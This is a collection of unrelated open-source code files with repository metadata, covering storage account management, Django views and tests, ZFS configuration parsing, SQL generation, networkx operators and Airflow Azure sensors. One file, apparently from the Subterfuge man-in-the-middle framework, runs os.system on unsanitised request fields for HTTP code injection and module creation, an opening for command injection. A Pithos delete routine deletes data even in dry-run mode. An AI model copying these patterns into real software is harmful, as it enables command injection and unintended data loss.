def _list_all_objects(self, account, virtual=False):
containers = self._list_all_containers(account)
objects = []
extend = objects.extend
for c in containers:
more = self._list_all_container_objects(account, c,
virtual=virtual)
extend([os.path.join(c, i) for i in more])
return objects
@manage_transactions()
def list_all_objects(self, account, virtual=False):
return self._list_all_objects(account, virtual)
def _list_past_versions(self, account, container, name):
versions = self.backend.list_versions(account, account, container,
name)
# do not return the current version
return list(x[0] for x in versions[:-1])
@manage_transactions()
def list_past_versions(self, account, container, name):
return self._list_past_versions(account, container, name)
@manage_transactions(lock_container_path=True)
def move_object(self, src_account, src_container, src_name, dest_account,
dry=True, silent=False):
if src_account not in self._existing_accounts():
raise NameError('%s does not exist' % src_account)
if dest_account not in self._existing_accounts():
raise NameError('%s does not exist' % dest_account)
trans = self.backend.wrapper.conn.begin()
try:
self._copy_object(src_account, src_container, src_name,
dest_account, move=True)
if dry:
if not silent:
print "Skipping database commit."
trans.rollback()
else:
trans.commit()
if not silent:
print "%s is deleted." % src_account
except:
trans.rollback()
raise
def _copy_object(self, src_account, src_container, src_name,
dest_account, move=False):
path = os.path.join(src_container, src_name)
fullpath = os.path.join(src_account, path)
dest_container = src_container
dest_name = src_name
meta = self.backend.get_object_meta(src_account, src_account,
src_container, src_name, 'pithos',
version=None)
content_type = meta.get('type')
# get source object history
versions = self._list_past_versions(src_account, src_container,
src_name)
# get source object permissions
permissions = self.backend.permissions.access_get(fullpath)
# get source object public
public = self.backend.get_object_public(src_account, src_account,
src_container, src_name)
if dest_container in self.backend.list_containers(dest_account,
dest_account):
# Note: if dest_container contains an object with the same name
# a new version with the contents of the source object will be
# created and the one in the destination container will pass to
# history
self.backend.copy_object(dest_account, src_account, src_container,
src_name, dest_account, dest_container,
dest_name, content_type, 'pithos',
meta={}, replace_meta=False,
permissions=permissions)
else:
# create destination container and retry
self.backend.put_container(dest_account, dest_account,
dest_container)
self.backend.copy_object(dest_account, src_account, src_container,
src_name, dest_account, dest_container,
dest_name, content_type, 'pithos',
meta={}, replace_meta=False,
permissions=permissions)
if move:
self.backend.delete_object(src_account, src_account,
src_container, src_name)
dest_path, dest_node = self.backend._lookup_object(dest_account,
dest_container,
dest_name)
assert dest_path == '/'.join([dest_account, path])
# turn history versions to point to the newly created node
for serial in versions:
self.backend.node.version_put_property(serial, 'node', dest_node)
if public:
# set destination object public
fullpath = '/'.join([dest_account, dest_container, dest_name])
self.backend.permissions.public_set(
fullpath,
self.backend.public_url_security,
self.backend.public_url_alphabet
)
def _merge_account(self, src_account, dest_account, delete_src=False):
# TODO: handle exceptions
# copy all source objects
for path in self._list_all_objects(src_account):
src_container, src_name = split_container_object_string(
'/%s' % path)
# give read permissions to the dest_account
permissions = self.backend.get_object_permissions(
src_account, src_account, src_container, src_name)
if permissions:
permissions = permissions[2]
permissions['read'] = permissions.get('read', [])
permissions['read'].append(dest_account)
self.backend.update_object_permissions(src_account,
src_account,
src_container,
src_name,
permissions)
self._copy_object(src_account, src_container, src_name,
dest_account, move=delete_src)
# move groups also
groups = self.backend.get_account_groups(src_account, src_account)
(v.replace(src_account, dest_account) for v in groups.values())
self.backend.update_account_groups(dest_account, dest_account,
groups)
if delete_src:
self._delete_account(src_account)
@manage_transactions(lock_container_path=True)
def merge_account(self, src_account, dest_account, only_stats=True,
dry=True, silent=False, delete_src=False):
if src_account not in self._existing_accounts():
raise NameError('%s does not exist' % src_account)
if dest_account not in self._existing_accounts():
raise NameError('%s does not exist' % dest_account)
if only_stats:
print "The following %s's entries will be moved to %s:" \
% (src_account, dest_account)
print "Objects: %r" % self._list_all_objects(src_account)
print "Groups: %r" \
% self.backend.get_account_groups(src_account,
src_account).keys()
return
trans = self.backend.wrapper.conn.begin()
try:
self._merge_account(src_account, dest_account, delete_src)
if dry:
if not silent:
print "Skipping database commit."
trans.rollback()
else:
trans.commit()
if not silent:
msg = "%s merged into %s."
print msg % (src_account, dest_account)
except:
trans.rollback()
raise
def _delete_container_contents(self, account, container):
self.backend.delete_container(account, account, container,
delimiter='/')
@manage_transactions(lock_container_path=True)
def delete_container_contents(self, account, container):
        return self._delete_container_contents(account, container)
def _delete_container(self, account, container):
self.backend.delete_container(account, account, container)
@manage_transactions(lock_container_path=True)
def delete_container(self, account, container):
        self._delete_container(account, container)
def _delete_account(self, account):
for c in self._list_all_containers(account):
self._delete_container_contents(account, c)
self._delete_container(account, c)
self.backend.delete_account(account, account)
@manage_transactions(lock_container_path=True)
def delete_account(self, account, only_stats=True, dry=True, silent=False):
if account not in self._existing_accounts():
raise NameError('%s does not exist' % account)
if only_stats:
print "The following %s's entries will be removed:" % account
print "Objects: %r" % self._list_all_objects(account)
print "Groups: %r" \
% self.backend.get_account_groups(account, account).keys()
return
self._delete_account(account)
trans = self.backend.wrapper.conn.begin()
try:
self._delete_account(account)
if dry:
if not silent:
print "Skipping database commit."
trans.rollback()
else:
trans.commit()
if not silent:
print "%s is deleted." % account
except:
trans.rollback()
raise
@manage_transactions(lock_container_path=True)
def create_account(self, account):
return self.backend._lookup_account(account, create=True)
@manage_transactions(lock_container_path=True)
def create_update_object(self, account, container, name, content_type,
data, meta=None, permissions=None,
request_user=None,
checksum_compute_class=NoChecksum):
meta = meta or {}
permissions = permissions or {}
assert checksum_compute_class in (
NoChecksum, Checksum), 'Invalid checksum_compute_class'
checksum_compute = checksum_compute_class()
size = 0
hashmap = []
for block_data in data_read_iterator(data, self.backend.block_size):
size += len(block_data)
hashmap.append(self.backend.put_block(block_data))
checksum_compute.update(block_data)
checksum = checksum_compute.hexdigest()
request_user = request_user or account
return self.backend.update_object_hashmap(request_user, account,
container, name, size,
content_type, hashmap,
checksum, 'pithos', meta,
True, permissions)
| gpl-3.0 | 2,453,471,580,110,344,000 | 39.576316 | 79 | 0.541215 | false |
Starbow/StarbowWebSite | starbowmodweb/streams/views.py | 1 | 1876 | from django.shortcuts import render_to_response
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from starbowmodweb.streams.models import StreamInfo
from starbowmodweb.streams.forms import AddStreamForm
@login_required
def edit_stream(request):
messages = []
# previous stream_info data or None, if not available
stream_info = StreamInfo.objects.filter(user=request.user).first()
if request.method == 'POST': # If the form has been submitted...
form = AddStreamForm(request.POST, instance=stream_info) # A form bound to the POST data
if form.is_valid():
if 'edit' in request.POST:
# add/edit stream
stream_info = form.save(commit=False)
stream_info.user = request.user
stream_info.save()
                messages.append('Your stream was added/edited successfully.')
elif 'delete' in request.POST:
# delete stream
stream_info.delete()
stream_info = None
messages.append('Your stream link was deleted.')
form = AddStreamForm()
else:
form = AddStreamForm(instance=stream_info) # An unbound form
ctx = RequestContext(request, {'form': form,
'messages': messages,
'edit': stream_info is not None})
return render_to_response('streams/register_stream.html', ctx)
def list_streams(request):
online_streams = StreamInfo.objects.filter(online=True).order_by('-viewers')
offline_streams = StreamInfo.objects.filter(online=False)
return render_to_response('streams/list_streams.html', {'online_streams': online_streams,
'offline_streams': offline_streams}) | mit | -1,552,262,692,296,011,000 | 44.780488 | 97 | 0.615139 | false |
ISKU/BOJ-AutoCommit | option.py | 1 | 4258 | DEFAULT_COMMIT_MESSAGE = 'BOJ #[NO]'
DEFAULT_DIR_NAME = '[NO]'
DEFAULT_POLL = 600
DEFAULT_SOURCE_NAME = '[NO]'
class Option:
def __init__(self, option):
self.option = option
def commit_message(self, problem):
if not 'commit_message' in self.option:
return self.replace_msg(DEFAULT_COMMIT_MESSAGE, problem)
return self.replace_msg(self.option['commit_message'], problem)
def source_tree(self, problem, repo_name):
if not 'source_tree' in self.option:
if self.mkdir():
return '%s/%s' % (repo_name, self.dir_name(problem))
return '%s' % self.repo_name
if self.option['source_tree'][-1] == '/':
if self.mkdir():
return '%s%s' % (self.option['source_tree'], self.dir_name(problem))
return '%s' % self.option['source_tree'][:-1]
if self.mkdir():
return '%s/%s' % (self.option['source_tree'], self.dir_name(problem))
return '%s' % self.option['source_tree']
def dir_name(self, problem):
if not 'dir_name' in self.option:
return self.replace_msg(DEFAULT_DIR_NAME, problem)
return self.replace_msg(self.option['dir_name'], problem)
def mkdir(self):
if not 'mkdir' in self.option:
return True
return self.option['mkdir']
def private(self):
if not 'private' in self.option:
return False
return self.option['private']
def poll(self):
if not 'poll' in self.option:
return DEFAULT_POLL
return self.option['poll']
def source_name(self, problem):
if not 'source_name' in self.option:
return self.replace_msg(DEFAULT_SOURCE_NAME, problem)
return self.replace_msg(self.option['source_name'], problem)
def lang(self, problem):
if not 'lang' in self.option:
return False, None
if problem['language'] != self.option['lang']:
return True, False
return True, True
def replace_msg(self, msg, problem):
msg = msg.replace('[NO]', problem['problem_id'])
msg = msg.replace('[TITLE]', problem['problem_title'])
return msg
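    # Illustrative sketch (the sample values are assumptions): with the
    # template 'BOJ #[NO] [TITLE]' and
    # problem = {'problem_id': '1000', 'problem_title': 'A+B'},
    # replace_msg returns 'BOJ #1000 A+B'.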
def get_ext(self, language):
extensions = {
'C': '.c',
'C++': '.cpp',
'C++11': '.cpp',
'C++14': '.cpp',
'C++17': '.cpp',
'Java': '.java',
'Java (OpenJDK)': '.java',
'C11': '.c',
'Python 2': '.py',
'Python 3': '.py',
'PyPy2': '.py',
'PyPy3': '.py',
'Ruby2.5': '.rb',
'Kotlin': '.kt',
'Swift': '.swift',
'C# 6.0': '.cs',
'Text': '.txt',
            'node.js': '.js',
'Go': '.go',
'F#': '.fs',
'PHP': '.php',
'Pascal': '.pas',
'Lua': '.lua',
'Perl': '.pl',
'Objective-C': '.m',
'Objective-C++': '.mm',
'C (Clang)': '.c',
'C++11 (Clang)': '.cpp',
'C++14 (Clang)': '.cpp',
'C++17 (Clang)': '.cpp',
'Golfscript': '.gs',
'Bash': '.sh',
'Fortran': '.f95',
'Scheme': '.scm',
'Ada': '.ada',
'awk': '.awk',
'OCaml': '.ml',
'Brainfuck': '.bf',
'Whitespace': '.ws',
'Tcl': '.tcl',
            'Assembly (32bit)': '.asm',
'D': '.d',
'Clojure': '.clj',
'Rhino': '.js',
'Cobol': '.cob',
'SpiderMonkey': '.js',
'Pike': '.pike',
'sed': '.sed',
'Rust': '.rs',
'Boo': '.boo',
'Intercal': '.i',
'bc': '.bc',
'Nemerle': '.n',
'Cobra': '.cobra',
'Algol 68': '.a68',
'Befunge': '.bf',
'Haxe': '.hx',
'LOLCODE': '.lol',
'VB.NET 4.0': '.vb',
'아희': '.aheui'
}
if not language in extensions:
return True, 'Unknown language'
return False, extensions[language]
| mit | -229,388,674,643,249,000 | 28.748252 | 84 | 0.443112 | false |
libretees/libreshop | libreshop/common/tests/test_UniqueTogetherFormSet.py | 1 | 3653 | from django.core.exceptions import ValidationError
from django.forms.models import inlineformset_factory
from django.test import TestCase
from ..forms.models import UniqueTogetherFormSet
from ..models import Inventory, Location, Warehouse
# Create your tests here.
class UniqueTogetherFormSetTest(TestCase):
def setUp(self):
self.post_data = {
'location_set-INITIAL_FORMS': '0',
'location_set-TOTAL_FORMS': '2',
'location_set-0-id': '',
'location_set-0-inventory': '',
'location_set-0-quantity': '',
# 'location_set-0-warehouse': '1',
'location_set-1-id': '',
'location_set-1-inventory': '',
'location_set-1-quantity': '',
# 'location_set-1-warehouse': '1',
}
def test_formset_raises_exception_for_duplicate_values_in_intermediate_model(self):
'''
Test that UniqueTogetherFormSet raises an exception when duplicate
values exist for an intermediate model's Meta.unique_together field.
'''
warehouse = Warehouse.objects.create(name='foo')
self.post_data.update({
'location_set-0-warehouse': warehouse.pk,
'location_set-1-warehouse': warehouse.pk,
})
FormSet = inlineformset_factory(
Inventory, Location, formset=UniqueTogetherFormSet,
fields=('inventory', 'warehouse')
)
formset = FormSet(data=self.post_data)
self.assertRaises(ValidationError, formset.clean)
def test_formset_is_valid_for_unique_values(self):
'''
Test that UniqueTogetherFormSet is valid when no duplicate values exist
for an intermediate model's Meta.unique_together field.
'''
warehouse1 = Warehouse.objects.create(name='foo')
warehouse2 = Warehouse.objects.create(name='bar')
self.post_data.update({
'location_set-0-warehouse': warehouse1.pk,
'location_set-1-warehouse': warehouse2.pk,
})
FormSet = inlineformset_factory(
Inventory, Location, formset=UniqueTogetherFormSet,
fields=('inventory', 'warehouse')
)
formset = FormSet(data=self.post_data)
self.assertTrue(formset.is_valid())
def test_formset_is_invalid_for_duplicate_values(self):
'''
Test that UniqueTogetherFormSet is invalid when duplicate values exist
for an intermediate model's Meta.unique_together field.
'''
warehouse = Warehouse.objects.create(name='foo')
self.post_data.update({
'location_set-0-warehouse': warehouse.pk,
'location_set-1-warehouse': warehouse.pk,
})
FormSet = inlineformset_factory(
Inventory, Location, formset=UniqueTogetherFormSet,
fields=('inventory', 'warehouse')
)
formset = FormSet(data=self.post_data)
self.assertFalse(formset.is_valid())
def test_formset_handles_null_values(self):
'''
Test that UniqueTogetherFormSet does not raise a KeyError exception if a
NULL value is specified within the FormSet.
'''
warehouse = Warehouse.objects.create(name='foo')
self.post_data.update({
'location_set-0-warehouse': warehouse.pk,
'location_set-1-warehouse': None,
})
FormSet = inlineformset_factory(
Inventory, Location, formset=UniqueTogetherFormSet,
fields=('inventory', 'warehouse')
)
formset = FormSet(data=self.post_data)
self.assertTrue(formset.is_valid())
| gpl-3.0 | 7,416,644,987,825,297,000 | 31.90991 | 87 | 0.61648 | false |
M-Carter/zettaknight | zk_import.py | 1 | 3525 | #!/usr/bin/python
import yaml
import json
import six
import logging
from zk_utils import spawn_job
#open logging instance
logger = logging.getLogger(__name__)
class ZkBase(object):
def __init__(self):
pass
def conv_str_to_dict(self, string):
'''
takes a console output and breaks each line on a newline, then
creates a formatted dictionary out of the first three columns
        output_dict['column1']['column2'] = 'column3'
'''
logger.debug('converting string input to a usable dictionary...')
assert isinstance(string, str) and string is not None, 'conv_str_to_dict requires a string'
ret = {}
for line in string.split('\n'):
#create a list from string
line = line.split()
if line:
name_ = line[0]
key_ = line[1]
value_ = line[2]
#create the key if it doesn't exist
if name_ not in ret:
ret[name_] = {}
ret[name_][key_] = value_
return ret
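    # Illustrative sketch (pool/property names are assumptions): a console
    # line such as "tank/data  compression  lz4" from `zfs get all -H`
    # becomes {'tank/data': {'compression': 'lz4'}} -- column one keys the
    # outer dict, columns two and three form the inner key/value pair.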
class ZkDatasets(ZkBase):
def __init__(self):
self.live_datasets = None
self.defined_datasets = None
def get_all_live_datasets(self):
'''function runs a zfs get all and returns a string output'''
dataset_configs = spawn_job('zfs get all -H')
return dataset_configs
    def get_live_datasets(self):
'''
takes the output from get_all_live_datasets and creates a usable dictionary
format will be dictionary['dataset']['zfs attribute'] = value
'''
dataset_configs = self.get_all_live_datasets()
return super(ZkDatasets, self).conv_str_to_dict(dataset_configs)
class ZkZpools(ZkBase):
def __init__(self):
self.live_zpools = None
self.defined_zpools = None
def get_all_live_zpools(self):
'''function runs a zpool get all and returns a string output'''
logger.debug('generating zpool get all statement...')
zpool_configs = spawn_job('zpool get all -H')
return zpool_configs
def get_live_zpools(self):
'''
takes the output from get_all_live_zpools and creates a usable dictionary
format will be dictionary['pool name']['zfs attribute'] = value
'''
logger.debug('retrieving live zpool information...')
zpool_configs = self.get_all_live_zpools()
zpool_dict = super(ZkZpools, self).conv_str_to_dict(zpool_configs)
return zpool_dict
def get_defined_zpools(self, file):
        '''opens the zettaknight zpool configuration file and converts it to a usable dictionary'''
logger.debug('retrieving zettaknight zpools from {0}...'.format(file))
assert file is not None
with open(file, 'r') as f:
conff = yaml.safe_load(f)
return conff
class ZkZettaknight:
def __init__(self):
pass
def get_zettaknight_config(self, file):
        '''opens the zettaknight configuration file and converts it to a usable dictionary'''
logger.debug('retrieving zettaknight configuration from {0}...'.format(file))
assert file is not None
with open(file, 'r') as f:
conff = yaml.safe_load(f)
return conff
| gpl-3.0 | 1,426,781,401,315,458,000 | 27.658537 | 99 | 0.560567 | false |
pfschwartz/openelisglobal-core | liquibase/OE2.9/testCatalogHT_Clinical/scripts/testResult.py | 6 | 3274 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def convert_type_to_symbole( type):
if type == 'Numeric' or type == 'numeric' :
return 'N'
if 'Free Text' in type:
return 'R'
if type == 'Select list':
return 'D'
if type == 'multi' or type == 'Multi Select':
return 'M'
return type
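# Illustrative examples (derived from the mapping above, not from the source
# data files): convert_type_to_symbole('Numeric') -> 'N',
# convert_type_to_symbole('Select list') -> 'D'; unrecognised types are
# returned unchanged.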
def esc_char(name):
if "'" in name:
return "$$" + name + "$$"
else:
return "'" + name + "'"
def get_split_names( name ):
split_name_list = name.split("/")
for i in range(0, len(split_name_list)):
split_name_list[i] = split_name_list[i].strip()
return split_name_list
def get_comma_split_names( name ):
split_name_list = [name]
if ',' in name:
split_name_list = name.split(",")
elif ';' in name:
split_name_list = name.split(";")
for i in range(0, len(split_name_list)):
split_name_list[i] = split_name_list[i].strip()
return split_name_list
test_names = []
sample_types = []
select = []
type = []
descriptions = []
name_file = open('testName.txt','r')
sample_type_file = open("sampleType.txt")
select_file = open("selectList.txt", 'r')
result_type_file = open("resultType.txt", 'r')
results = open("output/MassiveTestResults.sql", 'w')
for line in name_file:
test_names.append(line.strip())
name_file.close()
for line in sample_type_file:
sample_types.append(line.strip())
sample_type_file.close()
for line in select_file:
select.append(line.strip())
select_file.close()
for line in result_type_file:
type.append( line.strip())
result_type_file.close()
nextVal = " VALUES ( nextval( 'test_result_seq' ) "
order = 10
for row in range(0, len(test_names)):
if len(test_names[row]) > 1: #it's a new entry
result_type = convert_type_to_symbole(type[row])
description = esc_char(test_names[row] + "(" + sample_types[row] + ")")
if description not in descriptions:
descriptions.append(description)
if result_type == 'D' or result_type == 'M':
split_selections = get_comma_split_names( select[row])
for j in range(0, len(split_selections)):
dictionary_select = " ( select max(id) from clinlims.dictionary where dict_entry =" + esc_char(split_selections[j].strip()) + " ) "
results.write("INSERT INTO test_result( id, test_id, tst_rslt_type, value , lastupdated, sort_order)\n\t")
results.write( nextVal + ", ( select id from clinlims.test where description = " + description + " ) , '")
results.write( result_type + "' , " + dictionary_select + " , now() , " + str(order) + ");\n")
order += 10
else:
results.write("INSERT INTO test_result( id, test_id, tst_rslt_type, value , lastupdated, sort_order)\n\t")
results.write( nextVal + ", ( select id from clinlims.test where description = " + description + " ) , '")
results.write( result_type + "' , null , now() , " + str(order) + ");\n")
order += 10
print "Done results in MassiveTestResults.sql" | mpl-2.0 | -3,478,365,595,080,684,500 | 30.76 | 151 | 0.558338 | false |
thisisALPINE/subterfuge | modules/views.py | 21 | 6546 | import os
#Django Web Modules
from django.template import Context, loader
from django.http import HttpResponse
from django.http import HttpRequest
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.cache import never_cache
from django.template import RequestContext
#Database Models
from subterfuge.main.models import credentials
from subterfuge.modules.models import *
#Additional Views
from subterfuge.cease.views import *
from subterfuge.modules.views import *
# Subterfuge Module Builder
def build(request, modname, description):
#Create Module Directory
os.system('mkdir ' + str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'modules/' + modname + '/')
#Read Default .mods
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/mods/default.mod', 'r') as file:
default = file.readlines()
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/mods/default_settings.mod', 'r') as file:
defaultsettings = file.readlines()
print defaultsettings
#Format for new Module
default[2] = "$('#pluginconfigbox" + modname + "').hide();\n"
default[7] = "function show" + modname + "config()\n"
default[11] = "$('#pluginconfigbox" + modname + "').fadeIn(1000).show();\n"
default[16] = "<a href = '#" + modname + "'>\n"
default[17] = "<div onclick = 'show" + modname + "config()' id = 'plugin' name = '{{plugin}}'>\n"
default[18] = "<img src = '/static/images/plugins/" + modname + ".png'><br>\n"
default[19] = modname
defaultsettings[0] = "<div id = 'pluginconfigbox" + modname + "'>\n"
defaultsettings[1] = description
defaultsettings[2] = "<a href = '/" + modname + "/' name = 'pset'><div id = 'redbutton' style = 'margin-top: 385px; color: white;'>Start</div></a>\n"
#Write .mod files
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/mods/' + modname + '.mod', 'w') as file:
file.writelines(default)
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/mods/' + modname + '_settings.mod', 'w') as file:
file.writelines(defaultsettings)
#Add Module to database
newmod = installed(name = modname)
newmod.save()
# Subterfuge Module Builder
def create(request):
#Module Name
modname = str(request.POST['modname']).strip(" ")
des = ""
#Module Description
try:
description = request.FILES['description']
for chunk in description.chunks():
des = chunk
except:
print "No GUI Description"
#Create Module Space
build(request, modname, des)
#Get/Write Files
if request.FILES['modicon']:
icon = request.FILES['modicon']
dest = open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/images/plugins/' + modname + '.png', 'wb+')
for chunk in icon.chunks():
dest.write(chunk)
dest.close()
if request.FILES['exploitcode']:
exploitcode = request.FILES['exploitcode']
dest = open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'modules/' + modname + '/' + modname + '.py', 'wb+')
for chunk in exploitcode.chunks():
dest.write(chunk)
dest.close()
#Relay Template Variables
return render_to_response("home.ext", {
"status" : "on",
})
#################################
#Subterfuge Modules Section
#################################
def builder(request):
# Read in subterfuge.conf
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'subterfuge.conf', 'r') as file:
conf = file.readlines()
#Relay Template Variables
return render_to_response("mod.ext", {
"conf" : str(conf[20]).rstrip('\n'),
"module_name" : request.META['PATH_INFO'].rstrip('/').strip('/'),
"module_page" : "mods/" + request.META['PATH_INFO'].rstrip('/').strip('/') + "_page.mod"
})
#################################
#HTTP CODE INJECTION MOD
#################################
def httpcodeinjection(request, conf):
# HTTP CODE INJECTION MODULE CONFIGURATION
exploit = ""
payload = ""
ip = ""
port = "8080"
# Status
status = request.POST["status"]
# Exploit
if request.POST["iexploit"]:
exploit = request.POST["iexploit"]
# Payload
if request.POST["payload"]:
payload = request.POST["payload"]
# Options
# Custom Inject
if request.POST["custominject"]:
exploit = "custom"
# Write Custom Inject into File
with open(str(os.path.dirname(__file__)) + '/httpcodeinjection/inject.x', 'w') as file:
file.writelines(request.POST["custominject"])
# Determine Metasploit Usage
if request.POST["start-msf"]:
msf = request.POST["start-msf"] + "\n"
# Check IP/PORT
if request.POST["inject-ip"]:
ip = request.POST["inject-ip"]
if request.POST["inject-port"]:
port = request.POST["inject-port"]
# Update Inject Status
installed.objects.filter(name = "httpcodeinjection").update(active = status)
# Execute
os.system('python ' + str(os.path.dirname(os.path.abspath(__file__))) + '/httpcodeinjection/httpcodeinjection.py ' + exploit + ' ' + payload + " " + ip + " " + port)
# Execute
#os.system('xterm -e sh -c "python ' + str(os.path.dirname(os.path.abspath(__file__))) + '/httpcodeinjection/httpcodeinjection.py ' + method + ' ' + payload + '" &')
#################################
#TUNNEL BLOCK MODULE
#################################
def tunnelblock():
os.system('python ' + str(os.path.dirname(os.path.abspath(__file__))) + '/TunnelBlock/TunnelBlock.py')
#################################
#WPAD Hijacking
#################################
def wpad(request):
# Read in subterfuge.conf
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'subterfuge.conf', 'r') as file:
conf = file.readlines()
#Relay Template Variables
return render_to_response("wpad.dat", {
"na" : "na"
})
| gpl-3.0 | -4,396,786,117,080,553,000 | 33.634921 | 169 | 0.602047 | false |
DougFirErickson/qgisSpaceSyntaxToolkit | esstoolkit/external/networkx/algorithms/operators/all.py | 11 | 4215 | """Operations on many graphs.
"""
# Copyright (C) 2013 by
# Aric Hagberg <[email protected]>
# Dan Schult <[email protected]>
# Pieter Swart <[email protected]>
# All rights reserved.
# BSD license.
try:
from itertools import izip_longest as zip_longest
except ImportError: # Python3 has zip_longest
from itertools import zip_longest
import networkx as nx
#from networkx.utils import is_string_like
__author__ = """\n""".join([ 'Robert King <[email protected]>',
'Aric Hagberg <[email protected]>'])
__all__ = ['union_all', 'compose_all', 'disjoint_union_all',
'intersection_all']
def union_all(graphs, rename=(None,) , name=None):
"""Return the union of all graphs.
The graphs must be disjoint, otherwise an exception is raised.
Parameters
----------
graphs : list of graphs
List of NetworkX graphs
rename : bool , default=(None, None)
Node names of G and H can be changed by specifying the tuple
rename=('G-','H-') (for example). Node "u" in G is then renamed
"G-u" and "v" in H is renamed "H-v".
name : string
       Specify the name for the union graph.
Returns
-------
U : a graph with the same type as the first graph in list
Notes
-----
To force a disjoint union with node relabeling, use
    disjoint_union_all(G,H) or convert_node_labels_to_integers().
Graph, edge, and node attributes are propagated to the union graph.
If a graph attribute is present in multiple graphs, then the value
from the last graph in the list with that attribute is used.
See Also
--------
union
disjoint_union_all
"""
graphs_names = zip_longest(graphs, rename)
U, gname = next(graphs_names)
for H, hname in graphs_names:
U = nx.union(U, H, (gname, hname), name=name)
gname = None
return U
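# Usage sketch (not part of the original module): giving each input graph its
# own prefix keeps the node sets disjoint, e.g.
#   G, H = nx.path_graph(2), nx.path_graph(2)
#   U = union_all([G, H], rename=('G-', 'H-'))
#   sorted(U.nodes())   # ['G-0', 'G-1', 'H-0', 'H-1']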
def disjoint_union_all(graphs):
"""Return the disjoint union of all graphs.
This operation forces distinct integer node labels starting with 0
for the first graph in the list and numbering consecutively.
Parameters
----------
graphs : list
List of NetworkX graphs
Returns
-------
U : A graph with the same type as the first graph in list
Notes
-----
It is recommended that the graphs be either all directed or all undirected.
Graph, edge, and node attributes are propagated to the union graph.
If a graph attribute is present in multiple graphs, then the value
from the last graph in the list with that attribute is used.
"""
graphs = iter(graphs)
U = next(graphs)
for H in graphs:
U = nx.disjoint_union(U, H)
return U
def compose_all(graphs, name=None):
"""Return the composition of all graphs.
Composition is the simple union of the node sets and edge sets.
The node sets of the supplied graphs need not be disjoint.
Parameters
----------
graphs : list
List of NetworkX graphs
name : string
Specify name for new graph
Returns
-------
C : A graph with the same type as the first graph in list
Notes
-----
It is recommended that the supplied graphs be either all directed or all
undirected.
Graph, edge, and node attributes are propagated to the union graph.
If a graph attribute is present in multiple graphs, then the value
from the last graph in the list with that attribute is used.
"""
graphs = iter(graphs)
C = next(graphs)
for H in graphs:
C = nx.compose(C, H, name=name)
return C
def intersection_all(graphs):
"""Return a new graph that contains only the edges that exist in
all graphs.
All supplied graphs must have the same node set.
Parameters
----------
graphs_list : list
List of NetworkX graphs
Returns
-------
R : A new graph with the same type as the first graph in list
Notes
-----
Attributes from the graph, nodes, and edges are not copied to the new
graph.
"""
graphs = iter(graphs)
R = next(graphs)
for H in graphs:
R = nx.intersection(R, H)
return R
| gpl-3.0 | 9,105,696,972,748,943,000 | 26.913907 | 79 | 0.638909 | false |
Tagar/incubator-airflow | airflow/contrib/sensors/wasb_sensor.py | 3 | 3696 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from airflow.contrib.hooks.wasb_hook import WasbHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class WasbBlobSensor(BaseSensorOperator):
"""
Waits for a blob to arrive on Azure Blob Storage.
:param container_name: Name of the container.
:type container_name: str
:param blob_name: Name of the blob.
:type blob_name: str
:param wasb_conn_id: Reference to the wasb connection.
:type wasb_conn_id: str
:param check_options: Optional keyword arguments that
`WasbHook.check_for_blob()` takes.
:type check_options: dict
"""
template_fields = ('container_name', 'blob_name')
@apply_defaults
def __init__(self, container_name, blob_name,
wasb_conn_id='wasb_default', check_options=None, *args,
**kwargs):
super(WasbBlobSensor, self).__init__(*args, **kwargs)
if check_options is None:
check_options = {}
self.wasb_conn_id = wasb_conn_id
self.container_name = container_name
self.blob_name = blob_name
self.check_options = check_options
def poke(self, context):
self.log.info(
'Poking for blob: {self.blob_name}\n'
'in wasb://{self.container_name}'.format(**locals())
)
hook = WasbHook(wasb_conn_id=self.wasb_conn_id)
return hook.check_for_blob(self.container_name, self.blob_name,
**self.check_options)
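# Usage sketch (task and DAG names are assumptions, not from this module):
#   wait_for_blob = WasbBlobSensor(
#       task_id='wait_for_blob',
#       container_name='raw-data',
#       blob_name='exports/2018-05-01.csv',
#       wasb_conn_id='wasb_default',
#       poke_interval=60,
#       dag=dag)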
class WasbPrefixSensor(BaseSensorOperator):
"""
Waits for blobs matching a prefix to arrive on Azure Blob Storage.
:param container_name: Name of the container.
:type container_name: str
:param prefix: Prefix of the blob.
:type prefix: str
:param wasb_conn_id: Reference to the wasb connection.
:type wasb_conn_id: str
:param check_options: Optional keyword arguments that
`WasbHook.check_for_prefix()` takes.
:type check_options: dict
"""
template_fields = ('container_name', 'prefix')
@apply_defaults
def __init__(self, container_name, prefix, wasb_conn_id='wasb_default',
check_options=None, *args, **kwargs):
super(WasbPrefixSensor, self).__init__(*args, **kwargs)
if check_options is None:
check_options = {}
self.wasb_conn_id = wasb_conn_id
self.container_name = container_name
self.prefix = prefix
self.check_options = check_options
def poke(self, context):
self.log.info(
'Poking for prefix: {self.prefix}\n'
'in wasb://{self.container_name}'.format(**locals())
)
hook = WasbHook(wasb_conn_id=self.wasb_conn_id)
